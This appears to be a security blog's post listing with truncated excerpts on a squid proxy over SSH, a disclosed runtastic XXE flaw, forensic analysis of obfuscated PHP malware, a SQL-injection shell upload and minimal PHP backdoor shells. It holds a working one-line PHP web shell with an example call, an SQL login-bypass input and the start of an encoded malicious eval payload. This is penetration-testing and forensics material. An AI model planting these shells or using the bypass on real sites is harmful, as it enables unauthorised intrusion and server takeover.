Secure HTTP proxy with squid through an SSH tunnel

Today I once again experienced an annoying geoblocking restriction. Free proxies usually suck in performance and aren't the best decision if you're caring about your security. Unfortunately, I also don't have a VPN set up, so I decided to search for another fast but secure solution. This resulted in a basic HTTP proxy with restricted access through an SSH tunnel. This post is a short write-up to keep my performed steps - and maybe it's helping someone else searching for a similar solution. First, install the squid proxy from the…

Keep reading

XXE vulnerability on runtastic.com

NOTE: The described vulnerability has been responsibly disclosed to the runtastic team and has been fixed as of 07.04.2016. Last month I had to learn for the examination of one of my courses at university called "XML- and Webservice Security", when I had one of this "Too much theory, need more hands-on"-moment. That's when I started digging around for services offering XML file uploads (or something similar). I remembered that runtastic allows for manually uploading so called "GPX" files to be added as sports activity. GPX is…

Keep reading

Forensic Analysis of a Suspicious PHP File

When an attacker leaves behind malicious PHP code - for persistence or further attacks on regular visitors - they typically make some attempt to obfuscate their code. In the course of a forensic analysis, I've been presented with such a suspicious and highly obfuscated file: <?php preg_replace("/(.*)/\x65","\x45\x56\x61\x4c\x28\x27\x24\x76\x30\x30\x37\x64\x63\x35\x65\x38\x63\x39\x32\x39\x64\x37\x39\x38\x34\x64\x35\x66\x66\x33\x37\x66\x34\x39\x31\x62\x37\x32\x65\x62\…

Keep reading

Shell Upload through Blind SQL Injection

During a recent security audit I've been able to upload a PHP shell due to a deadly combination of a blind SQL injection vulnerability and misconfigured privileges. As often, I've been presented a simple login mask as entry to the admin interface. The login could be easily bypassed by typing '='. (Why this SQL injection works is best described by the comments of this bug report: http://bugs.mysql.com/bug.php?id=39337) Unfortunately, there wasn't much to mess with within the admin interface, so I kept focussing…

Keep reading

Minimal PHP Backdoor Shells

During a penetration test or for demonstration purposes it's often necessary to upload a (PHP) web shell through discovered vulnerabilities. There exist several complex (and interactive) backdoor shells in the web, but for minimal purposes these two snippets, presented at the "HackPra" course at my university, work perfectly well: <?php $_GET[0]($_GET[1]); Simply two GET-parameter, where the first one defines the function to call and the second one the command. Callable via e.g. backdoor.php?0=system&1=ls <?php $$_GET['data']=$_GET['to']…

Keep reading